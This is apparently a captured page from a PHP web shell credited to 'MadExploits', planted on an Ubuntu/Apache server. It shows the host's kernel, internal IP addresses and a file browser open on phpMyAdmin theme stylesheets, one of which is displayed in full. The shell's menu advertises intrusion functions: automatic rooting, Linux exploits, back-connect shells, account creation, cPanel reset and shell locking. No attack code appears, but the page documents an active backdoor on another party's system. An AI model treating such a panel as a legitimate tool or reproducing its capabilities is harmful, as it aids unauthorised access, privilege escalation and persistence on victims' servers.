Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
themes /
pmahomme /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
_alert.scss
1.01
KB
-rw-r--r--
_breadcrumb.scss
315
B
-rw-r--r--
_buttons.scss
259
B
-rw-r--r--
_card.scss
2.34
KB
-rw-r--r--
_codemirror.scss
1.21
KB
-rw-r--r--
_common.scss
55.5
KB
-rw-r--r--
_designer.scss
8.23
KB
-rw-r--r--
_direction.scss
182
B
-rw-r--r--
_enum-editor.scss
919
B
-rw-r--r--
_forms.scss
73
B
-rw-r--r--
_gis.scss
425
B
-rw-r--r--
_icons.scss
11.33
KB
-rw-r--r--
_jqplot.scss
4.76
KB
-rw-r--r--
_list-group.scss
323
B
-rw-r--r--
_modal.scss
73
B
-rw-r--r--
_nav.scss
537
B
-rw-r--r--
_navbar.scss
530
B
-rw-r--r--
_navigation.scss
7.57
KB
-rw-r--r--
_reboot.scss
159
B
-rw-r--r--
_resizable-menu.scss
623
B
-rw-r--r--
_rte.scss
563
B
-rw-r--r--
_tables.scss
390
B
-rw-r--r--
_variables.scss
2.71
KB
-rw-r--r--
printview.scss
2.16
KB
-rw-r--r--
theme-rtl.scss
35
B
-rw-r--r--
theme.scss
484
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _codemirror.scss
$textarea-cols: 40; $textarea-rows: 15; .CodeMirror { height: 20rem; direction: ltr; } #inline_editor_outer .CodeMirror { height: ceil($textarea-rows * 0.4em); } .insertRowTable .CodeMirror { min-height: ceil($textarea-rows * 0.6em); min-width: ceil($textarea-cols * 0.6em); border: 1px solid #a9a9a9; } #pma_console .CodeMirror-gutters { background-color: initial; border: none; } span { &.cm-keyword, &.cm-statement-verb { color: #909; } &.cm-variable { color: black; } &.cm-comment { color: #808000; } &.cm-mysql-string { color: #008000; } &.cm-operator { color: fuchsia; } &.cm-mysql-word { color: black; } &.cm-builtin { color: #f00; } &.cm-variable-2 { color: #f90; } &.cm-variable-3 { color: #00f; } &.cm-separator { color: fuchsia; } &.cm-number { color: teal; } } .autocomplete-column-name { display: inline-block; } .autocomplete-column-hint { display: inline-block; float: $right; color: #666; margin-#{$left}: 1em; } .CodeMirror-hints { z-index: 999; } .CodeMirror-lint-tooltip { z-index: 200; font-family: inherit; code { font-family: monospace; font-weight: bold; } }
Close